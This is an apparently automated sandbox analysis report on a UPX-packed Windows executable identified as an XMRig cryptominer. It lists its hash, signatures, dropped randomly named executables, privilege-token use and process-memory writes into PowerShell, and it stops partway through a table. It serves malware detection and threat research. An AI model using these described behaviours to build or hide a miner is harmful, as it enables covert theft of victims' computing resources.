Malware Analysis Report

2024-11-16 11:01

Sample ID 240612-mtlhwa1gpb
Target 341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe
SHA256 fcf8fc5f66704a004ea044d057c0430ea90f7a9cb5c0d394a1900dce69b4f7e5
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fcf8fc5f66704a004ea044d057c0430ea90f7a9cb5c0d394a1900dce69b4f7e5

Threat Level: Known bad

The file 341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

Xmrig family

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 10:45

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 10:45

Reported

2024-06-12 10:48

Platform

win7-20240611-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\MmzZyVw.exe N/A
N/A N/A C:\Windows\System\UJbVddf.exe N/A
N/A N/A C:\Windows\System\VwcbDvJ.exe N/A
N/A N/A C:\Windows\System\SOtqlrq.exe N/A
N/A N/A C:\Windows\System\lJTSWAI.exe N/A
N/A N/A C:\Windows\System\irYyHHH.exe N/A
N/A N/A C:\Windows\System\FAtBTQW.exe N/A
N/A N/A C:\Windows\System\dWUHejK.exe N/A
N/A N/A C:\Windows\System\lAmdSNg.exe N/A
N/A N/A C:\Windows\System\RQXaead.exe N/A
N/A N/A C:\Windows\System\BvzODwb.exe N/A
N/A N/A C:\Windows\System\cwjhGdI.exe N/A
N/A N/A C:\Windows\System\BvJFzGC.exe N/A
N/A N/A C:\Windows\System\ggSWvZU.exe N/A
N/A N/A C:\Windows\System\fKWnkZS.exe N/A
N/A N/A C:\Windows\System\CgGAGbN.exe N/A
N/A N/A C:\Windows\System\ZdaqaXL.exe N/A
N/A N/A C:\Windows\System\wNVhfXN.exe N/A
N/A N/A C:\Windows\System\bZcGdyX.exe N/A
N/A N/A C:\Windows\System\zSjaltF.exe N/A
N/A N/A C:\Windows\System\yCxHXfY.exe N/A
N/A N/A C:\Windows\System\yTzlWJD.exe N/A
N/A N/A C:\Windows\System\ffjrNUO.exe N/A
N/A N/A C:\Windows\System\dykxEMP.exe N/A
N/A N/A C:\Windows\System\BBVjZpy.exe N/A
N/A N/A C:\Windows\System\XATUWRa.exe N/A
N/A N/A C:\Windows\System\GJVfUrS.exe N/A
N/A N/A C:\Windows\System\xKrpqqH.exe N/A
N/A N/A C:\Windows\System\klNqSjZ.exe N/A
N/A N/A C:\Windows\System\bNCbPWi.exe N/A
N/A N/A C:\Windows\System\pgssfdG.exe N/A
N/A N/A C:\Windows\System\iOmywPv.exe N/A
N/A N/A C:\Windows\System\iPYOyFv.exe N/A
N/A N/A C:\Windows\System\LJtOFAw.exe N/A
N/A N/A C:\Windows\System\ocmfrEr.exe N/A
N/A N/A C:\Windows\System\HyISCiA.exe N/A
N/A N/A C:\Windows\System\pPZUzgm.exe N/A
N/A N/A C:\Windows\System\jixIaPN.exe N/A
N/A N/A C:\Windows\System\SOoPPnV.exe N/A
N/A N/A C:\Windows\System\DUJukZH.exe N/A
N/A N/A C:\Windows\System\PPRAmWH.exe N/A
N/A N/A C:\Windows\System\Qgxxpbt.exe N/A
N/A N/A C:\Windows\System\xqRPAQy.exe N/A
N/A N/A C:\Windows\System\vveTePb.exe N/A
N/A N/A C:\Windows\System\vUfOhJm.exe N/A
N/A N/A C:\Windows\System\qHYbYrJ.exe N/A
N/A N/A C:\Windows\System\hpjuQFi.exe N/A
N/A N/A C:\Windows\System\YeaCzxq.exe N/A
N/A N/A C:\Windows\System\TDoijeU.exe N/A
N/A N/A C:\Windows\System\XkFnCVg.exe N/A
N/A N/A C:\Windows\System\KXnVWTB.exe N/A
N/A N/A C:\Windows\System\rerNJQn.exe N/A
N/A N/A C:\Windows\System\BCQcRTu.exe N/A
N/A N/A C:\Windows\System\oFCKjmX.exe N/A
N/A N/A C:\Windows\System\JSiYGXQ.exe N/A
N/A N/A C:\Windows\System\EDCcqaZ.exe N/A
N/A N/A C:\Windows\System\zeZuiWb.exe N/A
N/A N/A C:\Windows\System\iWetlBw.exe N/A
N/A N/A C:\Windows\System\ynifzlK.exe N/A
N/A N/A C:\Windows\System\MtaytWT.exe N/A
N/A N/A C:\Windows\System\vHuaZSR.exe N/A
N/A N/A C:\Windows\System\RdriDZE.exe N/A
N/A N/A C:\Windows\System\UOLhwUK.exe N/A
N/A N/A C:\Windows\System\YRAvXgZ.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ecUeyls.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QNzknwV.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ArBxFGR.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pdbFYol.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LJzMbTH.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lkrGmiA.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pzDzLhT.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NwmYGWV.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MhjDQNq.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\McKZtLB.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pMgXoir.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VOUBTnl.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SZjbLzv.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gyTAgbd.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Ufoaywr.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CgGAGbN.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\egFbDYU.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uddtunb.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gvkReKx.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BLhtMWT.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tsfCUmL.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\enqidYj.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fwekfxK.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RnbyMnR.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FfRNrCF.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KaNlDQb.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oLahZQb.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UQFMQSA.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XATUWRa.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UQferBs.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fjYxJcw.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wNihfcI.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hCPmIho.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RCQceMY.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QqbyjHK.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sqHwUOC.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XODYBMI.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nJnnuUf.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hYXElnH.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BSJGvha.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NzojLoA.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uFaAAVW.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kXfsfjc.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dfNMDbx.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jvfshhx.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TmiQvZD.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XnsqsDU.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kaNPvYO.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QeepoJT.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PFJaWQd.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\imDmUQb.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qwetESW.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iawNeMh.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tahGuMS.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hAacOsl.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kdENEnQ.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SnSceGL.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XiYjxIG.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kMaTciU.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WGyKDpE.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BwQxQqH.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vPjocyq.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Rgiynjv.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vAfgLiA.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2944 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\MmzZyVw.exe
PID 2944 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\MmzZyVw.exe
PID 2944 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\MmzZyVw.exe
PID 2944 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\UJbVddf.exe
PID 2944 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\UJbVddf.exe
PID 2944 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\UJbVddf.exe
PID 2944 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\VwcbDvJ.exe
PID 2944 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\VwcbDvJ.exe
PID 2944 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\VwcbDvJ.exe
PID 2944 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SOtqlrq.exe
PID 2944 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SOtqlrq.exe
PID 2944 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SOtqlrq.exe
PID 2944 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lJTSWAI.exe
PID 2944 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lJTSWAI.exe
